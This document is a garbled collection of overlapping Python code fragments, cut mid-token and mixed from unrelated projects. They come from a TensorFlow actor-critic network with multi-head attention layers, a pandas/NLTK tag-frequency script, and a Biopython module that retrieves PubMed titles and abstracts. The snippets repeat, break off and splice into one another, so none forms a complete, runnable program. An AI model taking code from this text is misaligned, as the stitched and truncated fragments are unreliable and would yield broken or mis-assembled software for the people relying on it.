seq_len_k)", "return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k, q, mask): batch_size", "seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__()", "self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)]", "self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model)", "= LSTM(lstm_units) def call(self, x, z, training, mask=None): z = self.embedding(z) z =", "in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim,", "num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd =", "x, z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies,", "self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,", "LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v, mask):", "the mask to the scaled tensor. if mask is not None: scaled_attention_logits +=", "Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the", "= tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) #", "self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have the", "self.num_heads == 0 self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk =", "mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if", "class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model =", "embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z): x =", "(batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q,", "z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in self.attention_blocks: x = attention_block(x)", "tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def", "return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads =", "self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,", "hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5,", "range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training, mask=None): z = self.embedding(z)", "self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z],", "super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model % self.num_heads ==", "padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate)", "# (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size,", "= self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output)", "lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic,", "on the last axis (seq_len_k) so that the scores # add up to", "hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5,", "from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional", "seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention", "perm=[0, 2, 1, 3]) def call(self, v, k, q, mask): batch_size = tf.shape(q)[0]", "= SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out)", "(batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return", "k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32)", "training=training) if self.residual: x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if", "self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,", "x, z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z,", "self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v", "_ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x +", "if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic value =", "in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32", "seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention,", "z, training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1],", "class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5,", "= Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1)", "= in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z):", "super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units", "output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer):", "d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\",", "mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0],", "softmax is normalized on the last axis (seq_len_k) so that the scores #", "# Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation:", "self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units,", "[AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self,", "x, batch_size): \"\"\"Split the last dimension into (num_heads, depth). Transpose the result such", "self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer", "k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) #", "class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5,", "tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = tfp.distributions.Normal(loc=actor_output, scale=std) return value, dist", "= tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention =", "= matmul_qk / tf.math.sqrt(dk) # add the mask to the scaled tensor. if", "z) # Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if", "self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units,", "that the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size,", "the last dimension into (num_heads, depth). Transpose the result such that the shape", "q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k", "kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim,", "mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k =", "as inputs. padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2", "self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x =", "z], -1) for attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer):", "__init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32,", "cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual:", "lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1,", "= scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3])", "2, 1, 3]) def call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q", "(batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights", "filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have the same shape as", "class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units", "attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,", "= Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same'", "scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention", "== (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask)", "not None: scaled_attention_logits += (mask * -1e9) # softmax is normalized on the", "call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self,", "in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size,", "call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size,", "output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True,", "super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units =", "= self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10,", "super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units =", "result such that the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x =", "num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim,", "embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out =", "the scores # add up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (...,", "Activation('sigmoid') def call(self, x, z): # Critic value = self.critic(x, z) # Actor", "kernel_size=kernel_size, # Use 'same' padding so outputs have the same shape as inputs.", "= self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x,", "v) # (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model,", "2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1,", "tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention,", "the result such that the shape is (batch_size, num_heads, seq_len, depth) \"\"\" x", "= self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v) # (batch_size, seq_len, d_model)", "**kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer =", "not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x", "(batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention", "# add the mask to the scaled tensor. if mask is not None:", "= tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for", "# Use 'same' padding so outputs have the same shape as inputs. padding='same')", "num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output')", "Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self, x,", "v = self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size,", "text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self,", "in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x,", "self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x)", "import numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k,", "text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic =", "= self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) #", "(num_heads, depth). Transpose the result such that the shape is (batch_size, num_heads, seq_len,", "depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape ==", "self.last = last def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _", "1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in self.attention_blocks:", "kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size,", "vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def", "actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,", "scaled tensor. if mask is not None: scaled_attention_logits += (mask * -1e9) #", "# (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v,", "tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size,", "value = self.critic(x, z) # Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output)", "Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension into", "__init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs)", "self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads,", "Use 'same' padding so outputs have the same shape as inputs. padding='same') self.activation_layer", "(batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth)", "text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation =", "= LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self, x, training, mask=None):", "Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last", "num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer =", "= Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x)", "x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8,", "**kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks", "lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs):", "scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)", "residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z,", "self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual", "self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last", "Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding,", "q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size)", "batch_size) # (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads,", "= 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters,", "# (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)", "# (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k,", "z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128,", "# (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output," ]
[ "= result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index: allTag = allTag", "as np import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist", "allTag = \"\" for row in result.index: allTag = allTag + \" \"", "word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag =", "print(Tags) allTag = \"\" for row in result.index: allTag = allTag + \"", "\"\" for row in result.index: allTag = allTag + \" \" + result['Tag'][row]", "as pd import numpy as np import nltk nltk.download('punkt') import os import nltk.corpus", "\" + result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag fdist =", "from nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read result result =", "result.index: allTag = allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag) #", "row in result.index: allTag = allTag + \" \" + result['Tag'][row] token =", "import os import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize #", "import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag", "numpy as np import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import", "allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag) # find most popular", "read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for", "nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\")", "nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize", "from nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"]", "+ result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag fdist = FreqDist(token)", "= word_tokenize(allTag) # find most popular 20tag fdist = FreqDist(token) fdist20 = fdist.most_common(20)", "+ \" \" + result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag", "allTag = allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag) # find", "# read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\"", "result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row", "import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read result", "nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read result result", "\" \" + result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag fdist", "np import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist from", "Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index: allTag =", "import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize", "result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index: allTag = allTag +", "= allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag) # find most", "result['Tag'][row] token = word_tokenize(allTag) # find most popular 20tag fdist = FreqDist(token) fdist20", "FreqDist from nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags =", "import numpy as np import nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability", "nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags)", "import FreqDist from nltk.tokenize import word_tokenize # read result result = pd.read_csv(\"result.csv\") Tags", "nltk nltk.download('punkt') import os import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import", "= \"\" for row in result.index: allTag = allTag + \" \" +", "token = word_tokenize(allTag) # find most popular 20tag fdist = FreqDist(token) fdist20 =", "pandas as pd import numpy as np import nltk nltk.download('punkt') import os import", "os import nltk.corpus from nltk.probability import FreqDist from nltk.tokenize import word_tokenize # read", "import pandas as pd import numpy as np import nltk nltk.download('punkt') import os", "pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index: allTag", "in result.index: allTag = allTag + \" \" + result['Tag'][row] token = word_tokenize(allTag)", "word_tokenize(allTag) # find most popular 20tag fdist = FreqDist(token) fdist20 = fdist.most_common(20) print(fdist20)", "for row in result.index: allTag = allTag + \" \" + result['Tag'][row] token", "result = pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row in", "= pd.read_csv(\"result.csv\") Tags = result[\"Tag\"] print(Tags) allTag = \"\" for row in result.index:", "pd import numpy as np import nltk nltk.download('punkt') import os import nltk.corpus from" ]
[ "== '__main__': # path = 'D:/Desktop/artigos/rdml.pdf' # #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>'))", "Bio import Entrez import os import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from data_structures.document import", "= '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid", "!= '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems))", "title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return pmid except: return None", "# #id = 20367574 # print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available", "doc.raw_title = data['Title'] docs.append(doc) else: pmids_not_found.append(pmid) return docs, pmids_not_found #using PMID def get_data_from_pmid(pmid,", "'Abstract': ''} except: article = xml_data['PubmedBookArticle'][0]['BookDocument'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0]", "!= '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems))", "data = get_data_from_pmid(pmid, email) if data is None: pmids_not_found.append(pmid) else: if data['Title'] !=", "email): titles = [] for pdf_path in pdf_paths: with open(pdf_path, 'rb') as f:", "article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return {'Title': title, 'Abstract': abstract} except: return {'Title':", "= email Entrez.api_key = '<KEY>' handle = efetch(db='pubmed', id=int(pmid), retmode='xml') xml_data = read(handle)", "email, retmax) if pmids is None: return None else: docs, pmids_not_found = pmids_to_docs(pmids,", "Entrez.api_key = '<KEY>' try: title = get_title_from_io(file) pmid = get_data_from_term(term=title, email='<EMAIL>', retmax=1)[0] return", "= 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc =", "pmids = get_data_from_term(term, email, retmax) if pmids is None: return None else: docs,", "pmids = [] docs_not_found = [] try: for file in files: pmid =", "is None: pmids_not_found.append(pmid) else: if data['Title'] != '': sentences.extend(get_sentences_dictionary(data['Title'], passage_type = 't', doc_id=pmid,", "if pmid: pmids.append(pmid) else: docs_not_found.append(file.filename) docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs,", "else: docs, pmids_not_found = pmids_to_docs(pmids, email, dl_config) return docs def get_data_from_term(term, email, retmax):", "data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words, lower=dl_config.lower, remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization,", "split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if data['Abstract'] != '': sentences.extend(get_sentences_dictionary(data['Abstract'], passage_type = 'a', doc_id=pmid, stop_words=dl_config.stop_words,", "= Entrez.esearch(db=\"pubmed\", retmax=retmax, term=term, idtype=\"acc\", sort='relevance') record = Entrez.read(handle) handle.close() return record['IdList'] #Using", "handle.close() try: article = xml_data['PubmedArticle'][0]['MedlineCitation']['Article'] title = article['ArticleTitle'] try: abstract = article['Abstract']['AbstractText'][0] return", "email, dl_config) return docs def get_data_from_term(term, email, retmax): Entrez.email = email Entrez.api_key =", "remove_punctuation=dl_config.remove_punctuation, split_by_hyphen=dl_config.split_by_hyphen, lemmatization=dl_config.lemmatization, stems=dl_config.stems)) if sentences: doc = Document(sentences=sentences) doc.raw_title = data['Title'] docs.append(doc)", "return {'Title': title, 'Abstract': abstract} except: return {'Title': title, 'Abstract': ''} except: article", "print(get_data_from_pdf_path(path, '<EMAIL>')) # term = \"Predicting commercially available antiviral drugs that may act", "= \"Predicting commercially available antiviral drugs that may act on the novel coronavirus", "import sys sys.path.append(os.path.dirname(os.path.dirname(__file__))) import nltk from 